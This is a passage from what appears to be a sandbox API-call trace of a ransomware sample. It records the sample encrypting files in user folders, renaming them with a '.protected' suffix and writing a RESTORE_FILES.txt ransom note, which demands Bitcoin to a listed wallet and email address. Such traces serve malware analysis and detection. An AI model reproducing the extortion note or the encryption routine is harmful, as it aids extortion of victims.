nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0092.602] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.602] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0092.602] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.602] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.603] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.603] CloseHandle (hObject=0xb4) returned 1 [0092.603] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.protected") returned 67 [0092.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.protected")) returned 1 [0092.606] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.606] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.606] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\RESTORE_FILES.txt") returned 63 [0092.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.607] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.607] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.608] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.608] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.608] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.608] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.608] CloseHandle (hObject=0xa4) returned 1 [0092.608] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="Windows") returned -1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="Program Files") returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="Program Files (x86)") returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="$Recycle.bin") returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="System Volume Information") returned -1 [0092.608] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 42 [0092.608] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0092.608] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0092.608] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned 44 [0092.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.608] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.608] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.608] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.609] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.609] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\.") returned 44 [0092.609] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.609] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.609] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.609] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.609] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.609] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.609] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.609] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.609] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\..") returned 45 [0092.609] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.609] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.609] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.609] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.609] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.609] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.610] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.610] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.610] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.610] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.610] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0092.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.611] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0092.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.611] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.611] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.611] CloseHandle (hObject=0xb4) returned 1 [0092.611] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.protected") returned 64 [0092.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.protected")) returned 1 [0092.612] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Windows") returned -1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files") returned -1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files (x86)") returned -1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="$Recycle.bin") returned 1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="System Volume Information") returned -1 [0092.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0092.612] StrStrIW (lpFirst="Everywhere.search-ms", lpSrch=".protected") returned 0x0 [0092.612] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.613] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Windows") returned -1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files") returned -1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files (x86)") returned -1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="$Recycle.bin") returned 1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="System Volume Information") returned -1 [0092.613] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0092.613] StrStrIW (lpFirst="Indexed Locations.search-ms", lpSrch=".protected") returned 0x0 [0092.613] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.613] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.613] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.613] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.613] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.613] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\RESTORE_FILES.txt") returned 60 [0092.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.614] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.614] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.614] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.614] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.614] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.614] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.614] CloseHandle (hObject=0xa4) returned 1 [0092.614] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.614] lstrcmpiW (lpString1="SendTo", lpString2="Windows") returned -1 [0092.614] lstrcmpiW (lpString1="SendTo", lpString2="Program Files") returned 1 [0092.614] lstrcmpiW (lpString1="SendTo", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="SendTo", lpString2="$Recycle.bin") returned 1 [0092.615] lstrcmpiW (lpString1="SendTo", lpString2="System Volume Information") returned -1 [0092.615] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned 40 [0092.615] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0092.615] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0092.615] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned 42 [0092.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.615] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="Windows") returned -1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files") returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="$Recycle.bin") returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="System Volume Information") returned -1 [0092.615] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned 44 [0092.615] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0092.615] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0092.615] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned 46 [0092.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.615] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="Program Files") returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0092.615] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned 43 [0092.615] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0092.615] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0092.615] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*") returned 45 [0092.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.615] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="Windows") returned -1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="Program Files") returned 1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="$Recycle.bin") returned 1 [0092.616] lstrcmpiW (lpString1="Videos", lpString2="System Volume Information") returned 1 [0092.616] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 40 [0092.616] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0092.616] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0092.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 42 [0092.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.616] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.616] lstrcmpiW 